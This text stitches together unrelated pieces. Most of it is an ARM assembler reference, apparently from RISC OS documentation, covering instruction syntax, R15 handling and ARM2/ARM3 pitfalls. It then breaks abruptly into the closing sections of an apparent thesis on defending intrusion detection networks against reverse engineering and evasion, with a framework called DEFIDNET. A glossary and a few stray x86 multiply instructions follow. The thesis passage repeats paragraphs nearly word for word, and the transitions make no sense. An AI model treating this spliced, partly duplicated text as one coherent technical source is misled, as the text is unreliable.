Special actions are taken if any of the source registers are R15; the action is as
follows:
If Rm=R15 all 32 bits of R15 are used in the operation ie the PC +
PSR.
If Rn=R15 only the 24 bits of the PC are used in the operation.
If the destination register is R15, then the action depends on whether the
optional 'S' has been used:
If S is not present only the 24 bits of the PC are set.
If S is present the whole result is written to R15, the flags are
updated from the result. (However the mode, I and F bits can only
be changed when in non-user modes.)
Comparison Instructions
Syntax
op codecondS|P Rn, (#exp|Rm),shift
There are four comparison instructions; again, 'Op2' means '(#exp|Rm),shift':
Instruction Calculation
Performed
CMN Compare Rn + Op2
negated
CMP Compare Rn - Op2
TEQ Test equal Rn EOR Op2
TST Test Rn AND Op2
These are similar to the arithmetic and logical instructions listed above except
that they do not take a destination register since they do not return a result.
Also, they automatically set the condition flags (since they would perform no
useful purpose if they didn't). Hence, the 'S' of the arithmetic instructions is
implied. You can put an 'S' after the instruction to make this clearer.
These routines have an additional function which is to set the whole of the PSR
to a given value. This is done by using a 'P' after the op code, for example
TEQP.
Normally the flags are set depending on the value of the comparison. The I and
F bits and the mode and register bits are unaltered. The 'P' option allows the
corresponding eight bits of the result of the calculation performed by the
comparison to overwrite those in the PSR (or just the flag bits in user mode).
Example
TEQP PC, #&80000000 ; Set N flag, clear all others. Also
enable ; IRQs, FIQs, select User mode if privileged
The above example (as well as setting the N flag and clearing the others) will
alter the IRQ, FIQ and mode bits of the PSR - but only if you are in a
privileged mode.
The 'P' option is also useful in user mode, for example to collect errors:
STMFD sp!, {r0, r1, r14} ... BL routine1 STRVS r0,
[sp, #0] ; save error block ptr in return r0 ; in stack
frame if error MOV r1, pc ; save psr flags in r1 BL
routine2 ; called even if error from routine1 STRVS r0, [sp,
#0] ; to do some tidy up action etc. TEQVCP r1, #0 ; if
routine2 didn't give error, LDMFD sp!, {r0, r1, pc} ; restore error
indication from r1
Multiply Instructions
Syntax
MULcondS Rd,Rm,Rs
MLAcondS Rd,Rm,Rs,Rn
There are two multiply instructions:
Instruction Calculation
Performed
MUL Multiply Rd = Rm Rs
MLA Multiply- Rd = Rm Rs + Rn
accumulate
The multiply instructions perform integer multiplication, giving the least
significant 32 bits of the product of two 32-bit operands.
The destination register must not be R15 or the same as Rm. Any other register
combinations can be used.
If the 'S' is given in the instruction, the N and Z flags are set on the result, and
the C and V flags are undefined.
Examples
MUL R1,R2,R3 MLAEQS R1,R2,R3,R4
Branching Instructions
Syntax
Bcond expression
BLcond expression
There are essentially only two branch instructions but in each case the branch
can take place as a result of any of the 15 usable condition codes:
Instruction
B Branch
BL Branch and
link
The branch instruction causes the execution of the code to jump to the
instruction given at the address to be branched to. This address is held relative
to the current location.
Example
BEQ label1 ; branch if zero flag set BMI minus ; branch if
negative flag set
The branch and link instruction performs the additional action of copying the
address of the instruction following the branch, and the current flags, into
register R14. R14 is known as the 'link register'. This means that the routine
branched to can be returned from by transferring the contents of R14 into the
program counter and can restore the flags from this register on return. Hence
instead of being a simple branch the instruction acts like a subroutine call.
Example
BLEQ equal ......... ; address of this instruction
......... ; moved to R14 automatically .equal ......... ; start of
subroutine ......... MOVS R15,R14 ; end of subroutine
These instructions allow a single register to load a value from memory or save
a value to memory at a given address.
The instruction has two possible forms:
the address is specified by register(s), whose names are enclosed in
square brackets
the address is specified by an expression
Address Given By Registers
The simplest form of address is a register number, in which case the contents
of the register are used as the address to load from or save to. There are two
other alternatives:
pre-indexed addressing (with optional write back)
post-indexed addressing (always with write back)
With pre-indexed addressing the contents of another register, or an immediate
value, are added to the contents of the first register. This sum is then used as
the address. It is known as pre-indexed addressing because the address being
used is calculated before the load/save takes place. The first register (Rn
below) can be optionally updated to contain the address which was actually
used by adding a '!' after the closing square bracket.
Address Syntax Address
[Rn] Contents of Rn
[Rn,#m]! Contents of Rn + m
[Rn,-Rm]! Contents of Rn contents
of Rm
[Rn,-Rm,shift Contents of Rn
#s]! (contents of Rm shifted by
s places)
With post-indexed addressing the address being used is given solely by the
contents of the register Rn. The rest of the instruction determines what value is
written back into Rn. This write back is performed automatically; no '!' is
needed. Post-indexing gets its name from the fact that the address that is written
back to Rn is calculated after the load/save takes place.
Address Syntax Value Written Back
[Rn],#m Contents of Rn + m
[Rn],-Rm Contents of Rn contents
of
Rm
[Rn],-Rm,shift Contents of Rn (contents
#s of Rm shifted by s places)
The contents of register Rn give the base address from/to which the value(s)
are loaded or saved. This base address is effectively updated during the
transfer, but is only written back to if you follow it with a '!'.
Rlist provides a list of registers which are to be loaded or saved. The order
the registers are given, in the list, is irrelevant since the lowest numbered
register is loaded/saved first, and the highest numbered one last. For example,
a list comprising {R5,R3,R1,R8} is loaded/saved in the order R1, R3, R5, R8,
with R1 occupying the lowest address in memory. You can specify consecutive
registers as a range; so {R0-R3} and {R0,R1,R2,R3} are equivalent.
The type is a two-character mnemonic specifying either how Rn is updated, or
what sort of a stack results:
Mnemonic Meaning
DA Decrement Rn After each
store/load
DB Decrement Rn Before each
store/load
IA Increment Rn After each
store/load
IB Increment Rn Before each
store/load
EA Empty Ascending stack is used
ED Empty Descending stack is used
FA Full Ascending stack is used
FD Full Descending stack is used
an empty stack is one in which the stack pointer points to the first
free slot in it
a full stack is one in which the stack pointer points to the last data
item written to it
an ascending stack is one which grows from low memory addresses
to high ones
a descending stack is one which grows from high memory addresses
to low ones
In fact these are just different ways of looking at the situation - the way Rn is
updated governs what sort of stack results, and vice versa. So, for each type of
instruction in the first group there is an equivalent in the second:
LDMEA is the LDMDB
same as
LDMED is the LDMIB
same as
LDMFA is the LDMDA
same as
LDMFD is the LDMIA
same as
All Acorn software uses an FD (full, descending) stack. If you are writing
code for SVC mode you should try to use a full descending stack as well -
although you can use any type you like.
A '^' at the end of the register list has two possible meanings:
For a load with R15 in the list, the '^' forces update of the PSR.
Otherwise the '^' forces the load/store to access the User mode
registers. The base is still taken from the current bank though, and if
you try to write back the base it will be put in the User bank -
probably not what you would have intended.
Examples
LDMIA R5, {R0,R1,R2} ; where R5 contains the value
; &1484 ; This will load R0 from &1484
; R1 from &1488 ; R2 from
&148C LDMDB R5, {R0-R2} ; where R5 contains the
value ; &1484 ; This will load R0 from
&1478 ; R1 from &147C
; R2 from &1480
If there were a '!' after R5, so that it were written back to, then this would
leave R5 containing &1490 and &1478 after the first and second examples
respectively.
The examples below show directly equivalent ways of implementing a full
descending stack. The first uses mnemonics describing how the stack pointer is
handled:
STMDB Stackpointer!, {R0-R3} ; push onto stack ... LDMIA
Stackpointer!, {R0-R3} ; pull from stack
and the second uses mnemonics describing how the stack behaves:
STMFD Stackpointer!, {R0,R1,R2,R3} ; push onto stack ...
LDMFD Stackpointer!, {R0,R1,R2,R3} ; pull from stack
Using The Base Register
You can always load the base register without any side effects on
the rest of the LDM operation, because the ARM uses an internal
copy of the base, and so will not be aware that it has been loaded
with a new value.
However, you should see Appendix B: Warnings on the use of
ARM assembler for notes on using writeback when doing so.
You can store the base register as well. If you are not using write
back then no problem will occur. If you are, then this is the order in
which the ARM does the STM:
write the lowest numbered register to memory
do the write back
write the other registers to memory in ascending order.
So, if the base register is the lowest-numbered one in the list, its
original value is stored:
STMIA R2!, {R2-R6} ; R2 stored is value before write back
Otherwise its written back value is stored:
STMIA R2!, {R1-R5} ; R2 stored is value after write back
Using The Program Counter
If you use the program counter (PC, or R15) in the list of registers:
the PSR is saved with the PC; and (because of pipelining) it will be
advanced by twelve bytes from the current position
the PSR is only loaded if you follow the register list with a '^'; and
even then, only the bits you can modify in the ARM's current mode
are loaded.
It is generally not sensible to use the PC as the base register. If you do:
the PSR bits are used as part of the address, which will give an
address exception unless all the flags are clear and all interrupts are
enabled.
SWI Instruction
Syntax
SWIcond expression
SWIcond "SWIname" (BBC BASIC assembler)
The SWI mnemonic stands for Software Interrupt. On encountering a SWI, the
ARM processor changes into SVC mode and stores the address of the next
location in R14_svc - so the User mode value of R14 is not corrupted. The
ARM then goes to the SWI routine handler via the hardware SWI vector
containing its address.
The first thing that this routine does is to discover which SWI was requested. It
finds this out by using the location addressed by (R14_svc - 4) to read the
current SWI instruction. The op code for a SWI is 32 bits long; 4 bits identify
the op code as being for a SWI, 4 bits hold all the condition codes and the
bottom 24 bits identify which SWI it is. Hence 224 different SWI routines can
be distinguished.
When it has found which particular SWI it is, the routine executes the
appropriate code to deal with it and then returns by placing the contents of
R14_svc back into the PC, which restores the mode the caller was in.
This means that R14_svc will be corrupted if you execute a SWI in SVC mode
- which can have disastrous consequences unless you take precautions.
The most common way to call this instruction is by using the SWI name, and
letting the assembler translate this to a SWI number. The BBC BASIC
assembler can do this translation directly:
SWINE "OS_WriteC"
See the chapter entitled An introduction to SWIs for a full description of how
RISC OS handles SWIs, and the index of SWIs for a full list of the operating
system SWIs.
Warnings On The Use Of ARM Assembler
Introduction
The ARM processor family uses Reduced Instruction Set (RISC) techniques to
maximize performance; as such, the instruction set allows some instructions
and code sequences to be constructed that will give rise to unexpected (and
potentially erroneous) results. These cases must be avoided by all machine
code writers and generators if correct program operation across the whole
range of ARM processors is to be obtained.
In order to be upwards compatible with future versions of the ARM processor
family never use any of the undefined instruction formats:
those shown in the Acorn RISC Machine family Data Manual as
'Undefined' which the processor traps;
those which are not shown in the manual and which don't trap (for
example, a Multiply instruction where bit 5 or 6 of the instruction is
set).
In addition the 'NV' (never executed) instruction class should not be used (it is
recommended that the instruction 'MOV R0,R0' be used as a general
purpose no-op).
This chapter lists the instructions and code sequences to be avoided. It
is strongly recommended that you take the time to familiarize yourself with
these cases because some will only fail under particular circumstances which
may not arise during testing.
For more details on the ARM chip see the Acorn RISC Machine family Data
Manual. VLSI Technology Inc. (1990) Prentice-Hall, Englewood Cliffs, NJ,
USA: ISBN 0-13-781618-9.
Restrictions To The ARM Instruction Set
There are three main reasons for restricting the use of certain parts of the
instruction set:
Dangerous Instructions
Such instructions can cause a program to fail unexpectedly, for
example:
LDM R15,Rlist
Useless Instructions
It is better to reserve the instruction space occupied by existing
'useless' instructions for instruction expansion in future processors.
For example:
MUL R15,Rm,Rs
The safest default is always to add a NOP (e.g. MOV R0,R0) after a mode
changing instruction; this will guarantee correct operation regardless of the
code sequence following it.
or
op code{cond}{S} Rd,Rn,Rm,shiftname Rs
When R15 is used in the Rm position, it will give the value of the
PC together with the PSR flags.
When R15 is used in the Rn or Rs positions, it will give the value of
the PC without the PSR flags (PSR bits replaced by zeros).
MOV R0,#0 ORR R1,R0,R15 ; R1:=PC+PSR (bits 31:26,1:0
reflect PSR flags) ORR R2,R15,R0 ; R2:=PC (bits 31:26,1:0 set to
zero)
Note: The relevant instruction description in the ARM Acorn RISC Machine
family Data Manual should be consulted for full details of the behavior of
R15.
STM: Inclusion Of The Base In The Register List
Applicability: ARM2, ARM3
Warning: In the case of a STM with writeback that includes the base register in
the register list, the value of the base register stored depends upon its position
in the register list.
During an STM, the first register is written out at the start of the second cycle
of the instruction. When writeback is specified, the base is written back at the
end of the second cycle. An STM which includes storing the base, with the
base as the first register to be stored, will therefore store the unchanged value,
whereas with the base second or later in the transfer order, it will store the
modified value.
For example:
MOV R5,#&1000 STMIA R5!,{R5-R6} ; Stores value of
R5=&1000
MOV R5,#&1000 STMIA R5!,{R4-R5} ; Stores value of
R5=&1008
MUL/MLA: Register Restrictions
Applicability: ARM2, ARM3
Given MUL Rd,Rm,Rs
or MLA Rd,Rm,Rs,Rn
Then Rd & Rm must be different
registers
Rd must not be R15
Due to the way the Booth's algorithm has been implemented, certain
combinations of operand registers should be avoided. (The assembler will
issue a warning if these restrictions are overlooked.)
The destination register (Rd) should not be the same as the Rm operand
register, as Rd is used to hold intermediate values and Rm is used repeatedly
during the multiply. A MUL will give a zero result if Rm=Rd, and a MLA will
give a meaningless result.
The destination register (Rd) should also not be R15. R15 is protected from
modification by these instructions, so the instruction will have no effect, except
that it will put meaningless values in the PSR flags if the S bit is set.
All other register combinations will give correct results, and Rd, Rn and Rs
may use the same register when required.
LDM/STM: Address Exceptions
Applicability: ARM2, ARM3
Warning: Illegal addresses formed during a LDM or STM operation will not
cause an address exception.
Only the address of the first transfer of a LDM or STM is checked for an
address exception; if subsequent addresses over-flow or under-flow into
illegal address space they will be truncated to 26 bits but will not cause an
address exception trap.
The following examples assume the processor is in a non-user mode and
MEMC is being accessed:
MOV R0,#&04000000 ; R0=&04000000 STMIA R0,{R1-R2} ;
Address exception reported (base address illegal) MOV
R0,#&04000000 SUB R0,R0,#4 ; R0=&03FFFFFC STMIA R0,
{R1-R2} ; No address exception reported (base address
legal) ; code will overwrite data at address &00000000
Note: The exact behavior of the system depends upon the memory manager to
which the processor is attached; in some cases, the wraparound may be
detected and the instruction aborted.
LDC/STC: Address Exceptions
Applicability: ARM2, ARM3
Warning: Illegal addresses formed during a LDC or STC operation will not
cause an address exception (affects LDF/STF).
The co processor data transfer operations act like STM and LDM with the
processor generating the addresses and the co processor supplying/reading the
data. As with LDM/STM, only the address of the first transfer of a LDC or
STC is checked for an address exception; if subsequent addresses over-flow
or under-flow into illegal address space they will be truncated to 26 bits but
will not cause an address exception trap.
The Future
A familiar pattern with IDNs and their circumvention is that it is a never
ending cat and mouse game. Attackers evolve their modus operanti when
network defenses are bolstered or improved upon.
A recent approach is to use keys in the detection function. These keys, which
are secret, determine the internal behavior of the detector. However, as we
have also shown in this Thesis, the use of secret information might be
vulnerable to reverse engineering attacks if it is not done properly. Thus,
further research must be done to improve the robustness of this solution.
Most attacks succeed when the security is easily inverted during the feature
construction process and thus obtain real world evasions from the feature
vectors. Accordingly, research on one way feature construction methods (i.e.,
which cannot be inverted) may counteract such attacks. However, a security
analysis of these functions would be required before considering them for real
world deployment. Really, networked systems are compromised when not
enough attention is paid to the modus operanti of attacks and their frequency.
Many IDMs/IDSs concentrate solely on blocking mechanisms without
intelligent analysis being deployed either at the coding and deployment level
and where manual security scrutiny is either limited/constrained or ad hoc.
The sophistication of attackers evolves parallel to the robustness of defenses.
Thus, the design of robust countermeasures seems to be a never-ending
rigmarole. There are many solutions to counteract current attacks. These
contributions involve extensive work and open new interesting research
challenges.
Defending machine learning from reverse engineering and evasion attacks
against ML based IDSs makes some assumptions for the adversary that
nowadays are reasonable. Concretely, that the attacker knows the training data
distribution and the feature construction method. Even assuming that this
information is available to the adversary, an effective mechanism would be to
hide some other relevant information for the detection. This way, the attacker
would not know how to defend attack vectors that evade the classifier. A
recent approach is to use keys in the detection function. These keys, which are
secret, determine the internal behavior of the detector. However, as we have
also shown, the use of secret information might be vulnerable to reverse
engineering attacks if not done properly.
Attacks succeed because the adversary can easily invert the feature
construction process, and thus obtain real world evasions from the feature
vectors. Accordingly, research on one way feature construction methods (i.e.
which cannot be inverted) may counteract such attacks. Still, it would be
required a security analysis of these functions before considering them for real
scenarios.
Another open issue is the generalization of reverse engineering attacks to
randomized IDSs. Since the same idea can be extended to other randomized
detectors using a formal definition, more concrete work on the ground is
needed to generate similar attack strategies.
The design of countermeasures against reverse engineering attacks for
Anagrams also needs to be considered. For example, a possible
countermeasure to the proposed reverse engineering attack is to randomize the
choice of the random mask itself. However, the potential impact of such a
double randomization from the detection point of view must be further
analyzed.
The three points commented until now suggest that attacks and defenses to
strengthen the security of IDSs is a race between attackers and defenders.
One possible countermeasure is to Update DEFIDNET to facilitate dynamic
analysis of IDNs. One of the advantages of the proposed framework
DEFIDNET is that it facilitates the assessment of the risk of IDNs, by
virtually defining the assets and adversarial capabilities in the IDN. Thus, it
can be applied in dynamic scenarios by properly setting the parameters in real
time. The dynamic analysis assumes that the adversarial model changes over
time, due to the establishment of new countermeasures in the node channels,
the addition of new nodes and connections in the IDN, changes on the
influences, etc. This dynamism requires a constant reconfiguration. For
example, if it is known that a certain node is compromised and setting
countermeasures in this node cannot be afforded, then it may be useful to
decrease the influence on this node to reduce the propagation of the risk.
Currently, reconfiguration is not optimized in DEFIDNET as it must be
performed manually. Thus, automatic reconfiguration of the network would
allow to perform a faster, dynamic risk analysis.
A possible implementation of DEFIDNET with dynamic analysis would be its
integration with cloud computing platforms designed to deploy and manage
large networks of virtual machines. These virtual machines would be
instantiated as nodes of the IDN. Thus, whenever a new virtual machine is
created in the network, DEFIDNET may automatically suggest reconfiguration
alternatives and countermeasures to reduce the risk of the IDN.
Conclusion
All software is made up of machine-readable code. In fact, code is what makes
every program function the way it does. The code defines the software and the
decisions it will make. Reverse engineering, as applied to software, is the
process of looking for patterns in this code. By identifying certain code
patterns, an attacker can locate potential software vulnerabilities. Although
reverse engineering is legal as long as another person or group does not
explicitly copy another product, the ethical debate is sure to endure.
The main goal is to improve the security of intrusion detection systems and
networks operating with adversaries both external and internal by developing
techniques to analyze their vulnerabilities and countermeasures to increase
their resilience. In reality it is nigh on impossible to 100% secure IDNs in real
world scenarios. Indeed, it would be required that each independent node in
the IDN is properly secured, which is unrealistic in real world infrastructures
where economical and operational constraints apply. Consequently, it is
necessary to provide resilient architectures that maintain the protection
operative, even assuming that some nodes are being targeted.
IDNs may have many different architectures and operational settings, which
makes them a complex scenario. Traditionally, the more complex a system is,
the more security breaches it may expose. Accordingly, it is critical to design
methods to provide operators with global awareness of the IDNs, including the
assets of the IDNs and the threats to which it is exposed. Thus, these methods
may facilitate the security evaluation of IDNs. The abstraction offered by
DEFIDNET provides several advantages to design resilient architectures for
IDNs. On the one hand, it facilitates the definition of the assets of the IDNs and
the adversarial capabilities, which facilitates the risk assessment of the IDN.
On the other hand, it allows the business or organization to devise defense
strategies, optimizing the allocation of countermeasures that save resources,
which is always the ultimate goal of IDN systems.
Glossary
AI Artificial Intelligence
AS Attack Strategy
EA Evolutionary Algorithm
ESF Event Sharing Function
FC Feature Construction
GP Genetic Programming
ML Machine Learning
RF Response Function
mov eax,3
mov ecx,22222222h
mul ecx
mov eax,3
mov ecx,80000000h
mul ecx